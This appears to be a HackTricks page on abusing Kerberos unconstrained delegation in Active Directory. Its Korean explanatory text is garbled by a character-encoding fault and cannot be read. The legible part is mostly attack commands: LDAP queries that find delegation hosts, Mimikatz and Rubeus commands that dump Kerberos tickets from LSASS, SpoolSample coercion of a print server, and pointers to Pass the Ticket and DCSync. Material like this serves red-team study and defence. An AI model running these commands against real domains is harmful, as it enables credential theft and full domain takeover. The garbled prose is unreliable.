Unconstrained Delegation
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
Unconstrained delegation
์ด๊ฒ์ ๋๋ฉ์ธ ๊ด๋ฆฌ์๊ฐ ๋๋ฉ์ธ ๋ด์ ๋ชจ๋ ์ปดํจํฐ์ ์ค์ ํ ์ ์๋ ๊ธฐ๋ฅ์ ๋๋ค. ๊ทธ๋ฐ ๋ค์, ์ฌ์ฉ์๊ฐ ์ปดํจํฐ์ ๋ก๊ทธ์ธํ ๋๋ง๋ค ํด๋น ์ฌ์ฉ์์ TGT ๋ณต์ฌ๋ณธ์ด DC์์ ์ ๊ณตํ๋ TGS ๋ด๋ก ์ ์ก๋๊ณ LSASS์ ๋ฉ๋ชจ๋ฆฌ์ ์ ์ฅ๋ฉ๋๋ค. ๋ฐ๋ผ์ ํด๋น ๋จธ์ ์์ ๊ด๋ฆฌ์ ๊ถํ์ด ์๋ ๊ฒฝ์ฐ, ํฐ์ผ์ ๋คํํ๊ณ ์ฌ์ฉ์๋ฅผ ๊ฐ์ฅํ ์ ์์ต๋๋ค.
๋ฐ๋ผ์ ๋๋ฉ์ธ ๊ด๋ฆฌ์๊ฐ โUnconstrained Delegationโ ๊ธฐ๋ฅ์ด ํ์ฑํ๋ ์ปดํจํฐ์ ๋ก๊ทธ์ธํ๊ณ , ํด๋น ๋จธ์ ์์ ๋ก์ปฌ ๊ด๋ฆฌ์ ๊ถํ์ด ์๋ ๊ฒฝ์ฐ, ํฐ์ผ์ ๋คํํ๊ณ ๋๋ฉ์ธ ๊ด๋ฆฌ์๋ฅผ ์ด๋์๋ ๊ฐ์ฅํ ์ ์์ต๋๋ค (๋๋ฉ์ธ ๊ถํ ์์น).
์ด ์์ฑ์ ๊ฐ์ง ์ปดํจํฐ ๊ฐ์ฒด๋ฅผ ์ฐพ์ผ๋ ค๋ฉด userAccountControl ์์ฑ์ด ADS_UF_TRUSTED_FOR_DELEGATION๋ฅผ ํฌํจํ๋์ง ํ์ธํ๋ฉด ๋ฉ๋๋ค. ์ด๋ LDAP ํํฐ โ(userAccountControl:1.2.840.113556.1.4.803:=524288)โ๋ฅผ ์ฌ์ฉํ์ฌ ์ํํ ์ ์์ผ๋ฉฐ, ์ด๋ powerview๊ฐ ์ํํ๋ ์์ ์ ๋๋ค:
# List unconstrained computers
## Powerview
## A DCs always appear and might be useful to attack a DC from another compromised DC from a different domain (coercing the other DC to authenticate to it)
Get-DomainComputer โUnconstrained โProperties name
Get-DomainUser -LdapFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
## Access LSASS memory
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
## Doens't access LSASS memory directly, but uses Windows APIs
Rubeus.exe dump
Rubeus.exe monitor /interval:10 [/filteruser:<username>] #Check every 10s for new TGTs
๊ด๋ฆฌ์(๋๋ ํผํด์ ์ฌ์ฉ์)์ ํฐ์ผ์ ๋ฉ๋ชจ๋ฆฌ์ Mimikatz ๋๋ Rubeus๋ก ๋ก๋ํ์ฌ Pass the Ticket.
์์ธํ ์ ๋ณด: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
ired.team์ Unconstrained delegation์ ๋ํ ์ถ๊ฐ ์ ๋ณด.
๊ฐ์ ์ธ์ฆ
๊ณต๊ฒฉ์๊ฐ โUnconstrained Delegationโ์ด ํ์ฉ๋ ์ปดํจํฐ๋ฅผ ํ๋ฝ์ํฌ ์ ์๋ค๋ฉด, ๊ทธ๋ Print server๋ฅผ ์์ฌ์ ์๋์ผ๋ก ๋ก๊ทธ์ธํ๊ฒ ํ์ฌ ์๋ฒ์ ๋ฉ๋ชจ๋ฆฌ์ TGT๋ฅผ ์ ์ฅํ ์ ์์ต๋๋ค.
๊ทธ๋ฐ ๋ค์, ๊ณต๊ฒฉ์๋ ์ฌ์ฉ์ Print server ์ปดํจํฐ ๊ณ์ ์ ๊ฐ์ฅํ๊ธฐ ์ํด Pass the Ticket ๊ณต๊ฒฉ์ ์ํํ ์ ์์ต๋๋ค.
ํ๋ฆฐํธ ์๋ฒ๊ฐ ์ด๋ค ๋จธ์ ์ ๋ํด ๋ก๊ทธ์ธํ๋๋ก ํ๋ ค๋ฉด SpoolSample ์ ์ฌ์ฉํ ์ ์์ต๋๋ค:
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
TGT๊ฐ ๋๋ฉ์ธ ์ปจํธ๋กค๋ฌ์์ ์จ ๊ฒฝ์ฐ, DCSync attack๋ฅผ ์ํํ์ฌ DC์ ๋ชจ๋ ํด์๋ฅผ ์ป์ ์ ์์ต๋๋ค.
์ด ๊ณต๊ฒฉ์ ๋ํ ๋ ๋ง์ ์ ๋ณด๋ ired.team์์ ํ์ธํ์ธ์.
์ฌ๊ธฐ์์ ์ธ์ฆ์ ๊ฐ์ ํ๋ ๋ค๋ฅธ ๋ฐฉ๋ฒ์ ์ฐพ์ผ์ธ์:
Force NTLM Privileged Authentication
์ํ
- DA/Admin ๋ก๊ทธ์ธ์ ํน์ ์๋น์ค๋ก ์ ํ
- ํน๊ถ ๊ณ์ ์ ๋ํด โ๊ณ์ ์ด ๋ฏผ๊ฐํ๋ฉฐ ์์ํ ์ ์์โ ์ค์
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


